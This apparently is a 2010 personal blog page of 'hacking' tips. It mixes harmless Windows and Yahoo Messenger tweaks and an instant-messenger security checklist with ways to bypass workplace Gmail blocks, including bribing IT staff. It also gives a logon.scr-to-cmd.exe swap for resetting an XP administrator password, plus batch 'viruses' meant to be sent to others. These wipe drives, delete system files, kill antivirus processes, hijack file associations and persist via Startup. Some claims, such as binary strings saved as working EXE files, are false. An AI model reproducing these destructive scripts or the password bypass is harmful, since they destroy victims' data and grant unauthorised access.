Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, November 10, 2010

Change Windows Default Identity


In windows XP, you can change the windows default identity (Computer Manufacturer Logo and other information’s) and share your own private identity there. First you right click on My Computer then click on Properties, here may be you will see computer manufacture logo or empty area. So add your own logo there to make your computer more private.Follow the given steps to change the system default Properties identity:
First click on Start button and type notepad in Run option then press Enter.Now type the following text in notepad.
[General]
Manufacturer=”Vaseem Ansari”
Model=”CodeMasterz!”
[Support Information]
Line1=”Free Computer Tips And Tricks by Vaseem Ansari”
Line2=”vaseemansari.blogspot.com”
There are some standard keywords, for example Manufacturer, Model, Line 1, Line 2; you can not change these keywords. Now save this notepad file in c:/windows/system32 folder with file name, OEMINFO.INI.
Now choose your favorite picture to set as logo, using any picture editor resize the picture size approx. 150X150 pixels then save it in c:/windows/system32 folder with file name OEMLOGO.BMP.
Now close the all files and restart your computer after any changes to go into effect. To verify these changes, right click on My Computer and open Properties.




How to run multiple yahoo messengers and login to multiple yahoo messenger accounts.

For Yahoo! Messenger with Voice 8 users, it’s now possible to run multiple instances of Yahoo! Messengers and log into multiple Y!Msgr accounts with just a simple registry hack.

Multiple Yahoo! Messenger

If you prefer to edit and change the registry setting yourself manually, without using the above registry registration file, simply launch the registry editor (type regedit at Run command), and navigate to the following registry branch:

HKEY_CURRENT_USER\Software\yahoo\pager\Test

Then, on the right pane, right click on the registry editor and select “New”, then create a new DWORD registry value. Name the new registry key as Plural, and assign it the value of 1 (decimal). If some case, the value of 2 should also works. To disable or disallow multiple instance of Yahoo Messengers, simply change and set the “Plural” registry key’s value to 0, or delete the “Plural” key.

How To Access Blocked GMail From School or Office

Are you a GMail addict and tired of your office or school administration blocking access to GMail? Here is a guide with various tricks to unblock your favorite GMail and enjoy the full mail access at your organization.

1. Instead of gmail.com Use Different Address Like mail.google.com, google.com/mail, etc

Instead of using the URL gmail.com to access your GMail account, try other web address like mail.google.com, google.com/mail when GMail is blocked at your school/office. This trick is expected to work if the IT administrators has blocked gmail.com alone and left the rest of the domains open as they are not widely known to people. Here is the list of alternative address to access GMail

* http://m.gmail.com
* https://gmail.com
* http://google.com/mail
* http://mail.google.com or https://mail.google.com
* http://googlemail.com

Photobucket

2. Access Blocked GMail Using iGoogle

GMail is available as a gadge to iGoogle and you can use this gadget to access GMail. When you access GMail through iGoogle all the communication with the GMail servers is routed through iGoogle servers. So this defeats all the restriction and filters applied by IT administrators in blocking gmail.com domain.

Photobucket

To access GMail through iGoogle

1. Login to iGoogle using your Google Account
2. Add GMail gadget to iGoogle by following this link or by using Add Stuff on screen
3. That’s all. Start accessing your GMail inside iGoogle.

3. Access GMail Using Opera Mini Simulator

Use Opera Mini Browser Online Simulator application to access GMail in a small screen window. Opera Mini is a popular web browser for mobile phones. It allows users to work with live demo of Opera Mini that functions exactly like it would when installed on a handset.

Photobucket

Point your browser to http://www.operamini.com/demo/ and start accessing blocked GMail using the URL m.gmail.com.

Reading mails on mobile simulator is definitely not convenient as reading them on a full screen browser computer. But when you need to access your GMail urgently, This trick might be helpful to you.

4. Use Microsoft Outlook Or Other Mail Programs To Access GMail Using POP3/IMAP

Configure your mail clients like Outlook, Live Mail, Lotus Notes to access GMail using POP3 or IMAP protocol. This trick of accessing GMail when blocked is mostly useful for working professionals as they should be definitely using some mail client for official mail access.

You can find the instruction to configure POP3 and IMAP access for various mail clients over here and here.

5. Launch GMail from Google Talk

launch_gmail_from_google_talk At few organizations they block access to GMail but not to Google Talk. If that is the case at your organization, then you can launch GMail from Google Talk application. Sign in to GTalk and click on the envelope icon to launch access GMail.

6. Use Your Smart Phones

If you have internet connection on your mobile, you can make use of your mobile phone to access GMail.

GMail has an excellent native application for most of the mobiles like iPhone, Nokia, Android, Windows Mobile, etc. The ease at which you can read and reply to mails through GMail for Mobile is amazing. It is my favorite mobile application.

You can download GMail application for mobiles from Google

7. Use Proxy Web Site To Bypass

Using proxy website to beat censorship is one of the popular ways for unblocking any kind of websites. When we try to access GMail using a web proxy, the web proxy hides our IP address and uses it’s own IP address to load the page.

8. Nothing Working? Then Bribe Your IT Administrator

If none of the above methods worked for you then take help of someone at IT department and get access to GMail. Bribe them :) Offer small gifts, drinks or something else they like.

Either you can ask them to grant access for your PC or get details of internal proxy server that allow GMail access.

Hack Windows XP Admin Password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user ricky blah"

and this changes the password on franks machine to blah and your in.

How to make a Simple Virus using

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any antivirus

Here are some good viruses ,i am not responsible for any kind of damage to your system ... :)


  • Copy this to notepad and save as flood1.bat.....

@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

wat does it do : this is an extremely harmful virus the will keep replicating itself until your harddrive is totally full and will destroy ur comp.


  • A simple binary codes that can format the sytem drive ,secondary drives...


1) Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000

2) Save As An EXE Any Name Will Do
3)Send the EXE to People And Infect
  • Some other intersting formating codes....
1) format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
2) format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
3) format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

4) del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
  • Some more intersting stuff ..
open notepad


erase c:\windows


and save as

FINDOUTANAME.cmd


wat does it do:- will erase c:/windows ......Lol


  • Here is another one which is funny......

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."


  • This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat

  • This code about the computer shutdown:

@echo off
shutdown -s -t 5 -c "Shutdown"


  • Go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat

  • Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

  • Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Virus will:
1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
  • One more ...
try one this

Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous dont try on your own pc.

  • How to add ur own created viruses into start ups this will make it diifcult to detect them n to remove them ...

1) For this u can use the simple code below ..

@echo off

copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

n den rest of the code ..

2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

@echo off

copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
@echo off
shutdown -s -t 5 -c "Shutdown"
save it as abcd.bat when ever u will run it it will be saved in ur start ups..
here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol
For more on virus making refer this links
Do not try it on your PC. Don’t mess around this is for educational purpose only

How to Change Yahoo messenger title bar

Hey guys you can change the yahoo messenger title bar...
For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:
[APP TITLE]
CAPTION=Red Devil
Here you can write any name in place of Red Devil... then see the fun.... You can have your own name being placed in yahoo messenger title bar.

Enable Right Clicks on The Sites that Disable it

Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

10 Security Tips to Protect Yourself

Instant Messenger Hacks: 10 Security Tips to Protect Yourself
Most of us will agree that we are paranoid about email security and hack attacks. We should equally be concerned about the other popular connection device we use – the humble instant messenger. It is also open to some of the privacy risks we associate with emails.
Especially in a business environment, unsecured IM installations are creating backdoors for hack attacks. This threat has increased manifold because nearly all IM’s allow for exchange of files, images, songs and even peer to peer sharing of entire folders.
Spam, worms, Trojans and viruses are familiar email foes. They are no friends of instant messaging either. So how do we pick our friends from our foes? Perhaps by following what Benjamin Franklin said - Distrust and caution are the parents of security.
Also, by putting these 10 habits in place.
  1. Don’t give out your identity
  2. Every IM client asks you to create a screen name. A screen name usually refers to your email ID. Create a screen name which does not touch upon personal information or your real identity. For instance, my screen name is ‘Braniac’ and not ‘Saikat’. And NEVER provide any personal details including credit card numbers and social security number over the internet.
  3. Don’t chat with people not on your contact list
  4. Always vet your contact list with people whom you know something about. Talking with Mr. Anonymous at the other end of space may be fraught with risk. It is possible to discover your computer address (i.e. your IP) from an instant message and that usually is the first requirement for a remote hack attack.Don’t believe everything you read and always verify any information or request for information.
  5. Don’t click on spam links
  6. This is what a spam link might look like –This is probably what you will be bombarded with first. A link tempts you to click it just for the lark. A lot of these links take you to websites which can install spyware stealthily on your computer. For e.g. Viruses and worms with colorful names such as W32.Yalove or W32/Spybot-MQ are potential threats to Yahoo users. Ignore them.
  7. Don’t share files with your chat partner
  8. An IM client like Yahoo allows P2P file sharing. Do not share unknown content even if the person is known. P2P files, like email attachments can carry viruses, Trojan horses, and worms. They are engineered to seed themselves to other members on your buddy list. Be especially cautious when someone sends you an .exe or a .zip file.
  9. Don’t let potential hackers reach you
  10. Yahoo has an Ignore user or Report as spam so that he can’t disturb you once again. GTalk has a Block user option. Using this option allows you to keep out the unwanted from repeatedly messaging you. The default security settings in chat software tend to be relatively lax. Thus making you open to attacks. Check the settings and preferences of your chat client to apply stricter permission controls.
  11. Don’t Neglect Encryption
  12. Most IM clients lack encryption features. That essentially means that your messages can be tracked and read by eavesdropping hackers using technologies like packet sniffers or similar ones. Passwords are also a security loophole with hardly any client using strong password encryption.The subject of encryption and strong password protection would require another post by itself. So I hand you over to Tim’s excellent post on How To Secure & Encrypt Your Instant Messaging Chats. Here at MakeUseOf.com we have a lot of posts tagged as ‘passwords’. Why not take a look at ways to set strong passwords.
  13. Don’t use an older version of IM – Update
  14. IM client companies spend a lot of effort behind doors to prevent backdoor threats. Newer versions come with bug fixes and enhanced security. For instance, the latest version of Yahoo IM is better integrated with anti-virus solutions like Norton Internet Security and Norton Anti-Virus.So, always update your IM client as soon as one becomes available. If the chat client does not automatically prompt for an upgrade, go to the website and check your version number with the latest available. You can note the version of your particular client by clicking on Help – About
  15. Don’t download third party plug-ins from unverified sources
  16. A lot of third party plug-ins are available for download which enhance the chatting experience. It is safer and advisable to always download from the IM client websites themselves or from verified sources.
  17. Don’t forget to log-out completely
  18. It is an oft repeated habit to click on the [X] button and exit. But this action does not close our IM client completely. Most often, they continue to run in the system tray leaving it ‘open’ for a third person to access it. IMs also have a nasty habit of broadcasting your online presence even if left to run as a background task. Especially in public computers be mindful of logging out and exiting completely. Also, never click on any Remember My Password checkbox during log-in as an added safeguard.For Yahoo Users: Before you get up, delete your Yahoo Messenger profile. It is located by default at C:\Program Files\Yahoo!\Messenger\Profiles.
  19. Don’t forget the value of a good browser, a good firewall and an even better anti-virus
  20. Sometimes we will click a link; sometimes we will download a file. All the precautions in the world will not be able to protect us if we don’t have a secure browser, a good firewall and an anti-virus updated with the latest virus signatures. These three not only protect us from IM attacks but they are the must-haves for any system.
Chatting as against emailing is a real time activity. It is in that sense more social than any other form of web communication. The danger is that chatting can lull us into a false sense of security. Just a few fundamental forethoughts help us to turn that false sense into a more conscious sense of security.
Have you been hacked? Perhaps, you share the concern for a rigorous defense against hackers? Let us know what safety measures you personally use…

Thursday, September 2, 2010

How to delete all Scraps from your Orkut Account | Delete all Scraps from Orkut

This is another GreaseMonkey Script for all orkuttians using firefox
Recently I have seen lots of people on orkut keeping their scrapbook clean! Most of the time for privacy reason! This script will help them best as it is designed for them! I hope specially girls will find his useful!

Installation:
  1. This will require Firefox and GreaseMonkey! (New to GreaseMonkey?)
  2. After that click here to install Orkut Scrap Deleter Script. A window will pop-up just hit install option!
  3. Script is installed but READ NEXT FEW LINES BEFORE LEAVING THIS PAGE!
By default, the script is ENABLED! As you can see in screenshot, a check-mark will appear right before name of script! (You have to right-click on GreaseMonkey icon in lower-right corner of Firefox window.)
Now if you are in orkut then just open or refresh your scrapbook and it will start deleting scraps from oldest one first! The only way to STOP this is close the tab/window (i.e. scrapbook page) first and then again going to GreaseMonkey menu, DISABLE the script!
To ENABLE/DISABLE you have to just check/uncheck the script respectively from GreaseMonkey menu! No need to UNINSTALL the script!
I hope you will like this! Let me  know if you get some problems I know there may be few problems arise using this script.